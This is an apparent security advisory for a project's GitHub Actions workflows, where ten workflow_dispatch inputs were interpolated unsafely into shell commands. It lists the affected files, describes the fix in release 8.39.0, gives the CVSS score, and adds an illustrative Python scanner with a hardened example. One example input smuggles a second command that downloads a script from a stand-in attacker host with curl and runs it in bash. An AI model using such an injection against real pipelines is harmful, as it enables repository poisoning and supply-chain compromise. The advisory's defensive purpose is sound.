Three GitHub Actions workflow files contained 10 shell injection points where
user-controlled workflow_dispatch inputs were interpolated directly into shell
commands via ${{ }} expression syntax. An attacker with repository write access
could inject arbitrary shell commands, leading to repository poisoning and supply
chain compromise affecting all downstream users.
| Workflow file | Injection points |
|------------------------------------------|------------------|
| .github/workflows/maven-version.yml | 4 |
| .github/workflows/cherrypick.yml | 5 |
| .github/workflows/maven-release.yml | 1 |
GitHub Actions ${{ }} expressions inside run: blocks are substituted before
the shell interprets the command. When a workflow_dispatch input is placed directly
in a run: block, an attacker who can trigger the workflow can break out of the
intended command and execute arbitrary code.
maven-version.yml (before fix):

```yaml
- name: Set the name of the branch
  run: echo "PR_BRANCH=action/${{ github.event.inputs.next_version }}" >> "$GITHUB_ENV"
```
A malicious input such as `1.0.0"; curl attacker.com/backdoor.sh | bash; echo "`
would be interpolated directly into the shell, executing arbitrary commands with
the job's GITHUB_TOKEN permissions (contents: write, pull-requests: write).
contents: write token (push malicious commits)

Fixed in two PRs merged into release 8.39.0:

- Replaced all direct ${{ inputs.* }} interpolation in run: blocks with
  environment variable indirection. Inputs are...
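As an added example (not the project's code), a small scanner for this pattern, with the vulnerable step from the advisory beside a hardened rewrite that uses the environment-variable indirection the fix describes; the hardened YAML and the scanner are my construction, not the merged PRs.

```python
import re

# Constructed samples (not the project's files): the vulnerable step quoted in the
# advisory, and a hardened rewrite. In the hardened form the expression is expanded
# into an env var by the runner, so the shell sees "$NEXT_VERSION" as data, never
# as part of the command text.
VULNERABLE_STEP = """\
- name: Set the name of the branch
  run: echo "PR_BRANCH=action/${{ github.event.inputs.next_version }}" >> "$GITHUB_ENV"
"""

HARDENED_STEP = """\
- name: Set the name of the branch
  env:
    NEXT_VERSION: ${{ github.event.inputs.next_version }}
  run: echo "PR_BRANCH=action/$NEXT_VERSION" >> "$GITHUB_ENV"
"""

# A ${{ ... }} expression that reads a workflow_dispatch input (inputs.* or
# github.event.inputs.*) from inside a run: script.
INPUT_EXPR = re.compile(r"\$\{\{[^}]*\binputs\.[^}]*\}\}")

def find_run_injections(workflow_text):
    """Return (line_number, expression) pairs for input expressions inside run: blocks.

    A run: value is either a single line or a block scalar (run: | / run: >) whose
    continuation lines are indented deeper than the run: key itself.
    """
    findings = []
    lines = workflow_text.splitlines()
    i = 0
    while i < len(lines):
        m = re.match(r"^(\s*(?:-\s+)?)run:\s*(.*)$", lines[i])
        if not m:
            i += 1
            continue
        key_col, value = len(m.group(1)), m.group(2)
        block = [(i, value)]
        if value.strip() in ("|", ">", "|-", ">-", "|+", ">+"):
            j = i + 1
            while j < len(lines) and (not lines[j].strip() or len(lines[j]) - len(lines[j].lstrip()) > key_col):
                block.append((j, lines[j]))
                j += 1
            i = j
        else:
            i += 1
        for lineno, text in block:
            findings.extend((lineno + 1, expr) for expr in INPUT_EXPR.findall(text))
    return findings

if __name__ == "__main__":
    print("vulnerable:", find_run_injections(VULNERABLE_STEP))
    print("hardened:", find_run_injections(HARDENED_STEP))
```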
Fixed version: 8.39.0

CVSS 3.1 base score: 9.1, vector CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H